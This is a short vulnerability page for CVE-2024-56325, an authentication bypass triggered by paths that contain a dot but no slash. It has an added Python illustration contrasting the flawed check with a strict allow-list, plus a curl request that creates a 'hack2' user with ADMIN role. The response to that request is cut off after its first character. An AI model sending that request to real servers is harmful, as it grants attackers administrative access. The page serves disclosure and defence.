CVE-2024-56325 Information

Description

Authentication Bypass Issue

If the path does not contain "/" and contains ".", authentication is not required.
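The condition above, modelled as an added example (not code from the affected project or from the advisory): it contrasts an exemption based only on the shape of the path string with an exact allow-list limited to read-only methods. The function names, the allow-list contents and the sample requests are assumptions constructed for illustration.

```python
# Added illustration; not the affected project's source code. Function names,
# the allow-list and the sample requests are assumptions made for this example.
from typing import Iterable, List, Tuple

# Hypothetical set of static files a web UI might serve without login.
STATIC_ALLOWLIST = frozenset({"index.html", "favicon.ico"})


def relative_path(raw: str) -> str:
    """Path relative to the application root, query string and leading '/' removed (assumed form)."""
    return raw.split("?", 1)[0].lstrip("/")


def exempt_as_described(path: str) -> bool:
    """The condition quoted in the description: no '/' and at least one '.'."""
    return "/" not in path and "." in path


def exempt_strict(method: str, path: str) -> bool:
    """Hardened variant: only read-only requests for exact, known file names."""
    return method in ("GET", "HEAD") and path in STATIC_ALLOWLIST


def over_broad(requests: Iterable[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Requests the described rule exempts from authentication but the strict rule does not."""
    flagged = []
    for method, raw in requests:
        path = relative_path(raw)
        if exempt_as_described(path) and not exempt_strict(method, path):
            flagged.append((method, raw))
    return flagged


# Constructed sample requests: (method, request path).
SAMPLE = [
    ("GET", "/index.html"),      # static file: exempt under both rules
    ("POST", "/users"),          # no dot: authentication required under both
    ("GET", "/tables/a.b"),      # contains '/': authentication required under both
    ("POST", "/report.v2"),      # not a static file, yet matches the described rule
    ("DELETE", "/favicon.ico"),  # allow-listed name, but not a read-only method
]

if __name__ == "__main__":
    for method, raw in over_broad(SAMPLE):
        print("exempt by string shape only:", method, raw)
```
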

Expected Normal Request and Response Example

curl -X POST -H "Content-Type: application/json" -d '{"username":"hack2","password":"hack","component":"CONTROLLER","role":"ADMIN","tables":[],"permissions":[],"usernameWithComponent":"hack_CONTROLLER"}' http://{server_ip}:9000/users

Return: {

Reference

http://www.openwall.com/lists/oss-security/2025/03/27/8
https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v
